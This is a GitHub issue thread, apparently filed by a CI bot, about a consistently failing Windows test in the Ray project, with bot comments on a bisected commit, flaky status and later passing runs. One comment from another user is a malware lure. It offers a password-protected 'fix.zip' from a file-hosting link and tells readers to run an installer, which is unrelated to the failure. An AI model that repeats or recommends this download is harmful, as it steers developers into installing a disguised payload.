### ISSUE TITLE
CI test windows://:gcs_node_manager_test is consistently_failing

### ISSUE THREAD

**Issue by can-anyscale** [ray-project/ray#47395]
CI test **windows://:gcs_node_manager_test** is consistently_failing. Recent failures: 
	- https://buildkite.com/ray-project/postmerge/builds/6051#01919bac-fc12-4d67-a414-51c1fda47da5
	- https://buildkite.com/ray-project/postmerge/builds/6051#01919b73-eefe-4365-9c62-ed4551361275

DataCaseName-windows://:gcs_node_manager_test-END
Managed by OSS Test Policy

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by can-anyscale** [comment]
Blamed commit: d425f31c3489c9f0038262cff45d025c405d9ea5 found by bisect job https://buildkite.com/ray-project/release-tests-bisect/builds/1500

**Comment by can-anyscale** [comment]
This test is now considered as flaky because it has been failing on postmerge for too long. Flaky tests do not run on premerge.

**Comment by can-anyscale** [comment]
Test passed on latest run: https://buildkite.com/ray-project/postmerge/builds/6063#01919fc6-899f-418f-b6a0-acee32ec6219

**Comment by can-anyscale** [comment]
Test passed on latest run: https://buildkite.com/ray-project/postmerge/builds/6067#01919fdd-1c46-47cc-8800-421af562bc7b
